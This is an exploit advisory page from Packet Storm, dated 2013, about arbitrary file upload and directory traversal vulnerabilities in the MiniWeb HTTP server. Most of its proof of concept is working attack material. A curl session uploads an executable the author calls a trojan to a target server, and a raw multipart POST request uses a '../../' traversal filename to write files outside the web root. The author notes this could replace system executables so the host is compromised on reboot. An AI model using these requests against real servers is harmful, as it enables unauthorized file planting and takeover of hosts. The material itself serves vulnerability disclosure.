what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MiniWeb File Upload / Directory Traversal

MiniWeb File Upload / Directory Traversal
Posted Apr 9, 2013
Authored by Akastep

MiniWeb build 300 suffers from remote arbitrary file upload and directory traversal vulnerabilities.

tags | exploit, remote, arbitrary, vulnerability, file inclusion, file upload
SHA-256 | a57a2db6fe50d9e301599498e605af858c7f62b49d0e6f59f1d1c1a196cf857a

MiniWeb File Upload / Directory Traversal

Change Mirror Download
============================================================================================
Vulnerable Software: MiniWeb (build 300, built on Feb 28 2013)
Official Site: http://miniweb.sourceforge.net/
Vulns: Remote arbitrary file upload,Directory traversal.
Tested Software/version: MiniWeb (build 300, built on Feb 28 2013)
Tested on: Windows XP SP2 32 bit.
=================================About software:===========================================
MiniWeb is a mini HTTP server implementation written in C language, featuring low system resource consumption,
high efficiency, good flexibility and high portability. It is capable to serve multiple clients with a single thread,
supporting GET and POST methods, authentication,
dynamic contents (dynamic web page and page variable substitution) and file uploading.
MiniWeb runs on POSIX complaint OS, like Linux, as well as Microsoft Windows (Cygwin, MinGW and native build with Visual Studio).
The binary size of MiniWeb can be as small as 20KB (on x86 Linux). The target of the project is to provide a fast,
functional and low resource consuming HTTP server that is embeddable in other applications (as a static or dynamic library)
as well as a standalone web server.

MiniWeb supports transparent 7-zip decompression. Web contents can be compressed into
7-zip archieves and clients can access the contents inside the 7-zip archive just like in a directory.

MiniWeb can also be used in audio/video streaming applications,
or more specific, VOD (video-on-demand) service. Currently a VOD client/server is being developed on MiniWeb.
============================================================================================

About vulns:
This software suffers from 2 critical vulns:
Any remote/local user can upload arbitrary files to web server.
Proof of concept:

In this scenario using cygwin +curl remote attacker uploads troyan called "taskmgr.exe" to remote web server.


user@myhost /cygdrive/c/dir1/dir2
$ ipconfig

Íàñòðîéêà ïðîòîêîëà IP äëÿ Windows


Ïîäêëþ÷åíèå ïî ëîêàëüíîé ñåòè - Ethernet àäàïòåð:

Ñîñòîÿíèå ñåòè . . . . . . . . . : ñåòü îòêëþ÷åíà

VirtualBox Host-Only Network - Ethernet àäàïòåð:

DNS-ñóôôèêñ ýòîãî ïîäêëþ÷åíèÿ . . :
IP-àäðåñ . . . . . . . . . . . . : 192.168.0.1
Ìàñêà ïîäñåòè . . . . . . . . . . : 255.255.255.0
Îñíîâíîé øëþç . . . . . . . . . . : 192.168.0.1

user@myhost /cygdrive/c/dir1/dir2
$ curl -I 192.168.0.15:8000
curl: (52) Empty reply from server

user@myhost /cygdrive/c/dir1/dir2
$ curl 192.168.0.15:8000
<html><head><title>/</title></head><body><table border=0 cellpadding=0 cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
width=35%><a href='../'>..</a></td><td width=15%><dir></td><td width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr></
table><hr><i>Directory content generated by MiniWeb</i></body></html>
user@myhost /cygdrive/c/dir1/dir2

$ #Uploading remotely our troyan to remote system.

user@myhost /cygdrive/c/dir1/dir2
$ curl -i -F name=taskmgr.exe -F filedata=@taskmgr.exe http://192.168.0.15:8000/epicfail/
HTTP/1.1 404 Not Found
Server: MiniWeb
Content-length: 125
Content-Type: text/html

<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL has no content.</p></body></html>
user@myhost /cygdrive/c/dir1/dir2
$ #Now fetching directory index from remote system.

user@myhost /cygdrive/c/dir1/dir2
$ curl 192.168.0.15:8000
<html><head><title>/</title></head><body><table border=0 cellpadding=0 cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
width=35%><a href='../'>..</a></td><td width=15%><dir></td><td width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr><t
r><td width=35%><a href='taskmgr.exe'>taskmgr.exe</a></td><td width=15%>329 KB</td><td width=15%>exe file</td><td>Sun, 07 Apr 2013
00:14:38 GMT</td></tr></table><hr><i>Directory content generated by MiniWeb</i></body></html>
user@myhost /cygdrive/c/dir1/dir2
user@myhost /cygdrive/c/dir1/dir2

$ #Lol our troyan (taskmgr.exe) uploaded successfully) This is design flaw.

user@myhost /cygdrive/c/dir1/dir2
$ curl 192.168.0.15:8000/taskmgr.exe>task2.exe


user@myhost /cygdrive/c/dir1/dir2
$ file task2.exe
task2.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed

user@myhost /cygdrive/c/dir1/dir2
$ rm -rf task2.exe


So,this means any remote user can upload,can spoof,can overwrite any files on remote server.

Moreover this web server software contains directory traversal vuln.
Using the second vuln this is possible to upload any troyan outside of document root to Operation System + spoof some system executables and as result
compromise remote operation system in eg on next reboot when it starts.
In this case attacker uses FIddler:

================================================================================
METHOD: POST
URL: http://192.168.0.15:8000/AAAAAAAAAAAAAAAAAAAAAAA

Host: 192.168.0.15:8000
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------78522398122376
Content-Length: 84906


request body:


-----------------------------78522398122376
Content-Disposition: form-data; name="user"

-----------------------------78522398122376
Content-Disposition: form-data; name="pass"

-----------------------------78522398122376
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt"
Content-Type: image/png

Dude! Your machine OwnEd!

-----------------------------78522398122376
Content-Disposition: form-data; name="button"

Upload
-----------------------------78522398122376--

================================================================================

Few Printscreens:

1remotesystem.PNG

http://s019.radikal.ru/i612/1304/09/510e3b430b04.png




2attackersends.PNG

http://s017.radikal.ru/i406/1304/a1/494cef4de6f0.png


3remotesystempwned.PNG


http://s05.radikal.ru/i178/1304/f3/5fe4d9cb2111.png




================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
exploit-db.com

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers+ ottoman38 & HERO_AZE

*Super special KUDOS to my bro Brendan Coles!
Love you and Respect you dude!
Thank you!*
================================================

/AkaStep




Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close